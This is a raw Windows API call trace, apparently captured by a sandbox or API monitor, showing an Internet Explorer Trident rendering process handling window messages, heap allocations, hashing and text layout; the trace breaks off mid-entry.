[0180.619] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0180.619] memcpy_s (in: _Destination=0xd9a900, _DestinationSize=0x118, _Source=0xd9a6c0, _SourceSize=0x118 | out: _Destination=0xd9a900) returned 0x0 [0180.619] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x12) returned 0x6dcea0 [0180.619] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0180.619] StrCmpICW (pszStr1="notify", pszStr2="mousemove") returned 1 [0180.619] StrCmpICW (pszStr1="notify", pszStr2="mouseover") returned 1 [0180.619] StrCmpICW (pszStr1="notify", pszStr2="mousedown") returned 1 [0180.619] StrCmpICW (pszStr1="notify", pszStr2="mouseup") returned 1 [0180.619] StrCmpICW (pszStr1="notify", pszStr2="intrnlDblClick") returned 5 [0180.619] StrCmpICW (pszStr1="notify", pszStr2="propertychange") returned -2 [0180.619] StrCmpICW (pszStr1="notify", pszStr2="focus") returned 8 [0180.620] StrCmpICW (pszStr1="notify", pszStr2="blur") returned 12 [0180.620] StrCmpICW (pszStr1="notify", pszStr2="startComposition") returned -5 [0180.620] StrCmpICW (pszStr1="notify", pszStr2="endComposition") returned 9 [0180.620] StrCmpICW (pszStr1="notify", pszStr2="compositionFull") returned 11 [0180.620] StrCmpICW (pszStr1="notify", pszStr2="char") returned 11 [0180.620] StrCmpICW (pszStr1="notify", pszStr2="composition") returned 11 [0180.620] StrCmpICW (pszStr1="notify", pszStr2="notify") returned 0 [0180.620] StrCmpICW (pszStr1="notify", pszStr2="mousemove") returned 1 [0180.620] StrCmpICW (pszStr1="notify", pszStr2="mouseover") returned 1 [0180.620] StrCmpICW (pszStr1="notify", pszStr2="mousedown") returned 1 [0180.620] StrCmpICW (pszStr1="notify", pszStr2="mouseup") returned 1 [0180.620] StrCmpICW (pszStr1="notify", pszStr2="intrnlDblClick") returned 5 [0180.620] StrCmpICW (pszStr1="notify", pszStr2="propertychange") returned -2 [0180.620] StrCmpICW (pszStr1="notify", pszStr2="focus") returned 8 [0180.620] StrCmpICW (pszStr1="notify", pszStr2="blur") returned 12 [0180.620] StrCmpICW (pszStr1="notify", pszStr2="startComposition") returned -5 [0180.620] StrCmpICW (pszStr1="notify", pszStr2="endComposition") returned 9 [0180.620] StrCmpICW (pszStr1="notify", pszStr2="compositionFull") returned 11 [0180.620] StrCmpICW (pszStr1="notify", pszStr2="char") returned 11 [0180.621] StrCmpICW (pszStr1="notify", pszStr2="composition") returned 11 [0180.621] StrCmpICW (pszStr1="notify", pszStr2="notify") returned 0 [0180.626] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0180.626] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dcea0 | out: hHeap=0x5e0000) returned 1 [0180.627] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x282, wParam=0x2, lParam=0x0, plResult=0x199334 | out: plResult=0x199334) returned 0x0 [0180.627] GetCurrentThreadId () returned 0xb48 [0180.627] GetCurrentThreadId () returned 0xb48 [0180.627] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0180.628] PostMessageW (hWnd=0x30316, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1 [0180.628] CActiveIMMAppEx_Trident:IActiveIMMApp:getContext (in: This=0x610430, hWnd=0x103e2, phIMC=0x199e44 | out: phIMC=0x199e44*=0x0) returned 0x0 [0180.628] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x199b70 | out: lpPoint=0x199b70) returned 1 [0180.629] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x199b70 | out: lpPoint=0x199b70) returned 1 [0180.629] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0180.629] GetCurrentThreadId () returned 0xb48 [0180.629] GetCurrentThreadId () returned 0xb48 [0180.630] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0180.630] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0180.630] GetCurrentThreadId () returned 0xb48 [0180.630] GetCurrentThreadId () returned 0xb48 [0180.630] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0180.630] GetCurrentThreadId () returned 0xb48 [0180.630] GetCurrentThreadId () returned 0xb48 [0180.630] GetCurrentThreadId () returned 0xb48 [0180.631] GetMessageTime () returned 30894140 [0180.631] GetMessagePos () returned 0x11e01d6 [0180.632] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x7, wParam=0x0, lParam=0x0, plResult=0x199da4 | out: plResult=0x199da4) returned 0x1 [0180.632] NtdllDefWindowProc_W () returned 0x0 [0180.632] GetCurrentThreadId () returned 0xb48 [0180.632] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0180.632] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0180.633] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x19a198 | out: lpPoint=0x19a198) returned 1 [0180.633] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0180.633] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x19a1a0 | out: lpPoint=0x19a1a0) returned 1 [0180.634] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0180.634] GetCurrentThreadId () returned 0xb48 [0180.634] GetCurrentThreadId () returned 0xb48 [0180.634] IsWinEventHookInstalled (event=0x8005) returned 0 [0180.634] GetCurrentThreadId () returned 0xb48 [0180.635] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x19a1a8 | out: lpPoint=0x19a1a8) returned 1 [0180.635] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0180.635] GetCurrentThreadId () returned 0xb48 [0180.636] GetCurrentThreadId () returned 0xb48 [0180.636] GetFocus () returned 0x103e2 [0180.636] GetCurrentThreadId () returned 0xb48 [0180.636] IsWinEventHookInstalled (event=0x8005) returned 0 [0180.636] GetCurrentThreadId () returned 0xb48 [0180.636] GetCurrentThreadId () returned 0xb48 [0180.637] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x19a198 | out: lpPoint=0x19a198) returned 1 [0180.637] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0180.638] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x19a1a0 | out: lpPoint=0x19a1a0) returned 1 [0180.638] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0180.638] GetCurrentThreadId () returned 0xb48 [0180.639] GetCurrentThreadId () returned 0xb48 [0180.639] IsWinEventHookInstalled (event=0x800a) returned 0 [0180.639] GetCurrentThreadId () returned 0xb48 [0180.640] LsSetDoc () returned 0x0 [0180.640] LsCreateLine () returned 0x0 [0180.643] LsDestroyLine () returned 0x0 [0180.643] GetFocus () returned 0x103e2 [0180.643] SystemParametersInfoW (in: uiAction=0x2006, uiParam=0x0, pvParam=0x19a268, fWinIni=0x0 | out: pvParam=0x19a268) returned 1 [0180.643] _CIsqrt () returned 0x3ff0027f [0180.643] _CIsqrt () returned 0x3ff0027f [0180.643] _CIatan2 () returned 0x20 [0180.644] QueryPerformanceCounter (in: lpPerformanceCount=0xd11de0 | out: lpPerformanceCount=0xd11de0*=3099946308450) returned 1 [0180.644] GetCurrentThreadId () returned 0xb48 [0180.644] GetCurrentThreadId () returned 0xb48 [0180.644] GetCurrentThreadId () returned 0xb48 [0180.645] QueryPerformanceCounter (in: lpPerformanceCount=0x19a1d8 | out: lpPerformanceCount=0x19a1d8*=3099946388974) returned 1 [0180.645] QueryPerformanceCounter (in: lpPerformanceCount=0x19a1a8 | out: lpPerformanceCount=0x19a1a8*=3099946400352) returned 1 [0180.645] QueryPerformanceCounter (in: lpPerformanceCount=0x19a12c | out: lpPerformanceCount=0x19a12c*=3099946412613) returned 1 [0180.645] QueryPerformanceCounter (in: lpPerformanceCount=0x19a118 | out: lpPerformanceCount=0x19a118*=3099946425391) returned 1 [0180.645] QueryPerformanceCounter (in: lpPerformanceCount=0x19a0bc | out: lpPerformanceCount=0x19a0bc*=3099946449129) returned 1 [0180.646] QueryPerformanceCounter (in: lpPerformanceCount=0x19a0b4 | out: lpPerformanceCount=0x19a0b4*=3099946498191) returned 1 [0180.646] QueryPerformanceCounter (in: lpPerformanceCount=0x199fd4 | out: lpPerformanceCount=0x199fd4*=3099946517910) returned 1 [0180.646] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0180.646] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0180.647] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0180.647] SetEvent (hEvent=0x304) returned 1 [0180.647] WTSGetActiveConsoleSessionId () returned 0x1 [0180.647] GetCurrentProcessId () returned 0xe14 [0180.648] GetCurrentThreadId () returned 0xb48 [0180.648] SetEvent (hEvent=0x668) returned 1 [0180.648] GetClientRect (in: hWnd=0x103e2, lpRect=0x19a240 | out: lpRect=0x19a240) returned 1 [0180.649] InitOnceExecuteOnce (in: InitOnce=0x6e89927c, InitFn=0x6dd8e660, Parameter=0x0, Context=0x0 | out: InitOnce=0x6e89927c, Parameter=0x0, Context=0x0) returned 1 [0180.649] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0180.650] GetAsyncKeyState (vKey=17) returned 0 [0180.650] GetAsyncKeyState (vKey=16) returned 0 [0180.651] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x19a0d0 | out: lpPoint=0x19a0d0) returned 1 [0180.651] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0180.651] memcpy_s (in: _Destination=0xd9aa20, _DestinationSize=0x118, _Source=0x19a118, _SourceSize=0x118 | out: _Destination=0xd9aa20) returned 0x0 [0180.651] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82f20 [0180.652] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0180.652] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0180.652] memcpy_s (in: _Destination=0xd9ab40, _DestinationSize=0x118, _Source=0xd9aa20, _SourceSize=0x118 | out: _Destination=0xd9ab40) returned 0x0 [0180.652] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83118 [0180.652] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0180.652] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83118 | out: hHeap=0x5e0000) returned 1 [0180.654] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82f20 | out: hHeap=0x5e0000) returned 1 [0180.654] GetMessageTime () returned 30897656 [0180.654] GetMessagePos () returned 0x11e01d6 [0180.655] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x105, wParam=0x1b, lParam=0xe0010001, plResult=0x19a1cc | out: plResult=0x19a1cc) returned 0x1 [0180.655] NtdllDefWindowProc_W () returned 0x0 [0180.655] GetCurrentThreadId () returned 0xb48 [0180.655] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0180.655] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0180.655] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0180.655] GetWindowLongW (hWnd=0x103e4, nIndex=-21) returned 7140024 [0180.655] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 0 [0180.655] QueryPerformanceCounter (in: lpPerformanceCount=0x19a3bc | out: lpPerformanceCount=0x19a3bc*=3099947452318) returned 1 [0180.656] RedrawWindow (hWnd=0x30316, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x2) returned 1 [0180.656] NtdllDefWindowProc_W () returned 0x0 [0180.656] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0180.657] GetAsyncKeyState (vKey=17) returned 0 [0180.657] GetAsyncKeyState (vKey=16) returned 0 [0180.657] GetAsyncKeyState (vKey=18) returned 0 [0180.657] TranslateMessage (lpMsg=0x19a5a8) returned 1 [0180.657] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0180.657] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0180.657] GetCurrentThreadId () returned 0xb48 [0180.657] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0180.657] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0180.657] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0180.657] KillTimer (hWnd=0x30316, uIDEvent=0x2028) returned 1 [0180.658] QueryPerformanceCounter (in: lpPerformanceCount=0x19a23c | out: lpPerformanceCount=0x19a23c*=3099947692850) returned 1 [0180.658] InitOnceExecuteOnce (in: InitOnce=0x6e89927c, InitFn=0x6dd8e660, Parameter=0x0, Context=0x0 | out: InitOnce=0x6e89927c, Parameter=0x0, Context=0x0) returned 1 [0180.659] GetFocus () returned 0x103e2 [0180.659] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0180.659] GetClientRect (in: hWnd=0x103e2, lpRect=0xcfcf44 | out: lpRect=0xcfcf44) returned 1 [0180.659] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0180.659] QueryPerformanceCounter (in: lpPerformanceCount=0x199d00 | out: lpPerformanceCount=0x199d00*=3099947832020) returned 1 [0180.659] GetDCEx (hWnd=0x103e2, hrgnClip=0x0, flags=0x12) returned 0x4010197 [0180.660] CreateRectRgnIndirect (lprect=0x199ca0) returned 0x1d040a78 [0180.660] MapWindowPoints (in: hWndFrom=0x103e2, hWndTo=0x0, lpPoints=0x199ce0, cPoints=0x1 | out: lpPoints=0x199ce0) returned 21823995 [0180.660] GetRandomRgn (hdc=0x4010197, hrgn=0x1d040a78, i=4) returned 1 [0180.660] OffsetRgn (hrgn=0x1d040a78, x=-507, y=-333) returned 2 [0180.660] MapWindowPoints (in: hWndFrom=0x103e2, hWndTo=0x0, lpPoints=0x199cf0, cPoints=0x1 | out: lpPoints=0x199cf0) returned 21823995 [0180.660] GetRegionData (in: hrgn=0x1d040a78, nCount=0x0, lpRgnData=0x0 | out: lpRgnData=0x0) returned 0x30 [0180.660] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x30) returned 0x9f6c070 [0180.660] GetRegionData (in: hrgn=0x1d040a78, nCount=0x30, lpRgnData=0x9f6c070 | out: lpRgnData=0x9f6c070) returned 0x30 [0180.660] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0180.661] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f6c070 | out: hHeap=0x5e0000) returned 1 [0180.661] DeleteObject (ho=0x1d040a78) returned 1 [0180.661] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x30) returned 0x9f6c1f8 [0180.661] ExtCreateRegion (lpx=0x0, nCount=0x30, lpData=0x9f6c1f8) returned 0x93040a6c [0180.661] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f6c1f8 | out: hHeap=0x5e0000) returned 1 [0180.661] SelectClipRgn (hdc=0x4010197, hrgn=0x93040a6c) returned 2 [0180.661] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x30) returned 0x9f6c150 [0180.661] ExtCreateRegion (lpx=0x0, nCount=0x30, lpData=0x9f6c150) returned 0x2a040a81 [0180.661] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f6c150 | out: hHeap=0x5e0000) returned 1 [0180.661] ValidateRgn (hWnd=0x103e2, hRgn=0x2a040a81) returned 1 [0180.661] DeleteObject (ho=0x93040a6c) returned 1 [0180.662] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0180.662] GetClientRect (in: hWnd=0x103e2, lpRect=0x199bf8 | out: lpRect=0x199bf8) returned 1 [0180.664] GetSysColor (nIndex=15) returned 0xf0f0f0 [0180.665] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x7c) returned 0x68caf8 [0180.665] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83160 [0180.665] HashData (in: pbData=0x9f83160, cbData=0x1, pbHash=0x198b70, cbHash=0x2 | out: pbHash=0x198b70) returned 0x0 [0180.665] HashData (in: pbData=0x198b6c, cbData=0x4, pbHash=0x198b78, cbHash=0x2 | out: pbHash=0x198b78) returned 0x0 [0180.665] HashData (in: pbData=0x9f83164, cbData=0xc, pbHash=0x198b74, cbHash=0x2 | out: pbHash=0x198b74) returned 0x0 [0180.665] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83160 | out: hHeap=0x5e0000) returned 1 [0180.665] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f830a0 [0180.665] HashData (in: pbData=0x9f830a0, cbData=0x1, pbHash=0x198b70, cbHash=0x2 | out: pbHash=0x198b70) returned 0x0 [0180.665] HashData (in: pbData=0x198b6c, cbData=0x4, pbHash=0x198b78, cbHash=0x2 | out: pbHash=0x198b78) returned 0x0 [0180.665] HashData (in: pbData=0x9f830a4, cbData=0xc, pbHash=0x198b74, cbHash=0x2 | out: pbHash=0x198b74) returned 0x0 [0180.665] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f830a0 | out: hHeap=0x5e0000) returned 1 [0180.666] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f830d0 [0180.666] HashData (in: pbData=0x9f830d0, cbData=0x1, pbHash=0x198b70, cbHash=0x2 | out: pbHash=0x198b70) returned 0x0 [0180.666] HashData (in: pbData=0x198b6c, cbData=0x4, pbHash=0x198b78, cbHash=0x2 | out: pbHash=0x198b78) returned 0x0 [0180.666] HashData (in: pbData=0x9f830d4, cbData=0xc, pbHash=0x198b74, cbHash=0x2 | out: pbHash=0x198b74) returned 0x0 [0180.666] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f830d0 | out: hHeap=0x5e0000) returned 1 [0180.666] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82fc8 [0180.666] HashData (in: pbData=0x9f82fc8, cbData=0x1, pbHash=0x198b70, cbHash=0x2 | out: pbHash=0x198b70) returned 0x0 [0180.666] HashData (in: pbData=0x198b6c, cbData=0x4, pbHash=0x198b78, cbHash=0x2 | out: pbHash=0x198b78) returned 0x0 [0180.666] HashData (in: pbData=0x9f82fcc, cbData=0xc, pbHash=0x198b74, cbHash=0x2 | out: pbHash=0x198b74) returned 0x0 [0180.666] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82fc8 | out: hHeap=0x5e0000) returned 1 [0180.667] GetSysColor (nIndex=15) returned 0xf0f0f0 [0180.667] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f830e8 [0180.667] HashData (in: pbData=0x9f830e8, cbData=0x1, pbHash=0x198b70, cbHash=0x2 | out: pbHash=0x198b70) returned 0x0 [0180.667] HashData (in: pbData=0x198b6c, cbData=0x4, pbHash=0x198b78, cbHash=0x2 | out: pbHash=0x198b78) returned 0x0 [0180.667] HashData (in: pbData=0x9f830ec, cbData=0xc, pbHash=0x198b74, cbHash=0x2 | out: pbHash=0x198b74) returned 0x0 [0180.667] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f830e8 | out: hHeap=0x5e0000) returned 1 [0180.667] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f830a0 [0180.668] HashData (in: pbData=0x9f830a0, cbData=0x1, pbHash=0x198b70, cbHash=0x2 | out: pbHash=0x198b70) returned 0x0 [0180.668] HashData (in: pbData=0x198b6c, cbData=0x4, pbHash=0x198b78, cbHash=0x2 | out: pbHash=0x198b78) returned 0x0 [0180.668] HashData (in: pbData=0x9f830a4, cbData=0xc, pbHash=0x198b74, cbHash=0x2 | out: pbHash=0x198b74) returned 0x0 [0180.668] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f830a0 | out: hHeap=0x5e0000) returned 1 [0180.668] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83160 [0180.668] HashData (in: pbData=0x9f83160, cbData=0x1, pbHash=0x198488, cbHash=0x2 | out: pbHash=0x198488) returned 0x0 [0180.668] HashData (in: pbData=0x198484, cbData=0x4, pbHash=0x198490, cbHash=0x2 | out: pbHash=0x198490) returned 0x0 [0180.668] HashData (in: pbData=0x9f83164, cbData=0xc, pbHash=0x19848c, cbHash=0x2 | out: pbHash=0x19848c) returned 0x0 [0180.668] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83160 | out: hHeap=0x5e0000) returned 1 [0180.668] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83190 [0180.668] HashData (in: pbData=0x9f83190, cbData=0x1, pbHash=0x198488, cbHash=0x2 | out: pbHash=0x198488) returned 0x0 [0180.668] HashData (in: pbData=0x198484, cbData=0x4, pbHash=0x198490, cbHash=0x2 | out: pbHash=0x198490) returned 0x0 [0180.668] HashData (in: pbData=0x9f83194, cbData=0xc, pbHash=0x19848c, cbHash=0x2 | out: pbHash=0x19848c) returned 0x0 [0180.668] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83190 | out: hHeap=0x5e0000) returned 1 [0180.668] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83130 [0180.668] HashData (in: pbData=0x9f83130, cbData=0x1, pbHash=0x198488, cbHash=0x2 | out: pbHash=0x198488) returned 0x0 [0180.668] HashData (in: pbData=0x198484, cbData=0x4, pbHash=0x198490, cbHash=0x2 | out: pbHash=0x198490) returned 0x0 [0180.668] HashData (in: pbData=0x9f83134, cbData=0xc, pbHash=0x19848c, cbHash=0x2 | out: pbHash=0x19848c) returned 0x0 [0180.668] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83130 | out: hHeap=0x5e0000) returned 1 [0180.669] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82f50 [0180.669] HashData (in: pbData=0x9f82f50, cbData=0x1, pbHash=0x198488, cbHash=0x2 | out: pbHash=0x198488) returned 0x0 [0180.669] HashData (in: pbData=0x198484, cbData=0x4, pbHash=0x198490, cbHash=0x2 | out: pbHash=0x198490) returned 0x0 [0180.669] HashData (in: pbData=0x9f82f54, cbData=0xc, pbHash=0x19848c, cbHash=0x2 | out: pbHash=0x19848c) returned 0x0 [0180.671] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82f50 | out: hHeap=0x5e0000) returned 1 [0180.672] GetSysColor (nIndex=15) returned 0xf0f0f0 [0180.672] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f830e8 [0180.672] HashData (in: pbData=0x9f830e8, cbData=0x1, pbHash=0x198488, cbHash=0x2 | out: pbHash=0x198488) returned 0x0 [0180.672] HashData (in: pbData=0x198484, cbData=0x4, pbHash=0x198490, cbHash=0x2 | out: pbHash=0x198490) returned 0x0 [0180.672] HashData (in: pbData=0x9f830ec, cbData=0xc, pbHash=0x19848c, cbHash=0x2 | out: pbHash=0x19848c) returned 0x0 [0180.672] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f830e8 | out: hHeap=0x5e0000) returned 1 [0180.672] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83118 [0180.672] HashData (in: pbData=0x9f83118, cbData=0x1, pbHash=0x198488, cbHash=0x2 | out: pbHash=0x198488) returned 0x0 [0180.672] HashData (in: pbData=0x198484, cbData=0x4, pbHash=0x198490, cbHash=0x2 | out: pbHash=0x198490) returned 0x0 [0180.672] HashData (in: pbData=0x9f8311c, cbData=0xc, pbHash=0x19848c, cbHash=0x2 | out: pbHash=0x19848c) returned 0x0 [0180.672] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83118 | out: hHeap=0x5e0000) returned 1 [0180.673] LsSetDoc () returned 0x0 [0180.673] LsCreateLine () returned 0x0 [0180.673] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0180.674] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0180.675] LsdnFinishRegular () returned 0x0 [0180.675] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0180.675] LsdnFinishRegular () returned 0x0 [0180.676] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0180.676] LsDisplayLine () returned 0x0 [0180.676] IOleInPlaceFrame:SetMenu (This=0xd90e40, hmenuShared=0x1004, holemenu=0x0, hwndActiveObject=0x1) returned 0x0 [0180.676] IOleInPlaceFrame:SetMenu (This=0xd90e20, hmenuShared=0x1004, holemenu=0x0, hwndActiveObject=0x0) returned 0x0 [0180.676] GetSysColor (nIndex=8) returned 0x0 [0180.677] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0180.677] GetSysColor (nIndex=8) returned 0x0 [0180.677] LsDestroyLine () returned 0x0 [0180.677] IOleInPlaceSite:CanInPlaceActivate (This=0xcfa380) returned 0x0 [0180.678] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6d60 [0180.678] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83118 [0180.678] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7d28 [0180.678] HashData (in: pbData=0x9f8311c, cbData=0x4, pbHash=0x9f83120, cbHash=0x2 | out: pbHash=0x9f83120) returned 0x0 [0180.678] HashData (in: pbData=0x6d7d28, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0180.678] HashData (in: pbData=0x6d7d2a, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0180.678] HashData (in: pbData=0x6d7d2c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0180.678] HashData (in: pbData=0x6d7d34, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0180.678] HashData (in: pbData=0x6d7d3c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0180.678] HashData (in: pbData=0x6d7d44, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0180.678] HashData (in: pbData=0x6d7d46, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0180.678] HashData (in: pbData=0x6d7d48, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0180.678] HashData (in: pbData=0x6d7d50, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0180.678] HashData (in: pbData=0x197b14, cbData=0x4, pbHash=0x197b00, cbHash=0x2 | out: pbHash=0x197b00) returned 0x0 [0180.678] HashData (in: pbData=0x6d7d5c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0180.678] HashData (in: pbData=0x6d7d64, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0180.678] HashData (in: pbData=0x6d7d70, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0180.679] HashData (in: pbData=0x6d7d74, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0180.679] HashData (in: pbData=0x6d7d7c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0180.679] HashData (in: pbData=0x6d7d88, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0180.679] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7d28 | out: hHeap=0x5e0000) returned 1 [0180.679] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83118 | out: hHeap=0x5e0000) returned 1 [0180.679] HashData (in: pbData=0x9ee6d60, cbData=0x1, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0180.679] HashData (in: pbData=0x197b1c, cbData=0x4, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0180.679] HashData (in: pbData=0x9ee6d64, cbData=0x4, pbHash=0x197b20, cbHash=0x2 | out: pbHash=0x197b20) returned 0x0 [0180.679] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6d60 | out: hHeap=0x5e0000) returned 1 [0180.679] RtlAllocateHeap 